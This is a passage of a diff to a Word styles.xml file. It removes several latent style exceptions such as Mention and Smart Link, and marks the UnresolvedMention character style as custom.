     <w:lsdException w:name="List Table 7 Colorful Accent 6" w:uiPriority="52"/>
-    <w:lsdException w:name="Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Smart Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Hashtag" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Unresolved Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Smart Link" w:semiHidden="1" w:unhideWhenUsed="1"/>
   </w:latentStyles>
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
@@ -815,7 +1111,7 @@
       <w:u w:val="single"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="UnresolvedMention">
+  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention">
     <w:name w:val="Unresolved Mention"/>
     <w:basedOn w:val="DefaultParagraphFont"/>
     <w:uiPriority w:val="99"/>
